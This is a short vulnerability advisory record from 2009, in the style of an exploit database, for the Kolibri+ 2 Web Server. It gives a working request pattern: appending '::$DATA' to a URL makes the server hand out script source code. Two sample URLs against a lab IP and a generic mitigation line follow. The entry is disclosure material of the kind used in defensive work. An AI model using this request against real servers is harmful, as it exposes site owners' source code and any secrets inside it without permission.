vendor:
Kolibri+ 2 Web Server
by:
Dr_IDE
7.5
CVSS
HIGH
Remote Arbitrary Source Code Disclosure
200
CWE
Product Name: Kolibri+ 2 Web Server
Affected Version From: Kolibri+ 2 Web Server
Affected Version To: Kolibri+ 2 Web Server
Patch Exists: NO
Related CWE: N/A
CPE: a:kolibri_plus:kolibri_plus_2_webserver
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
2009
Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of the application available. This vulnerability is similar to the one reported earlier by Skull-HacKeR. Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure (download in this case) by the following means: http://[ webserver IP]/[ file ][::$DATA] http://172.16.2.101/default.asp::$DATA http://172.16.2.101/index.php::$DATA
Mitigation:
Ensure that the web server is configured to only serve files from the intended directory and that the web server is not configured to serve files from any other directory.
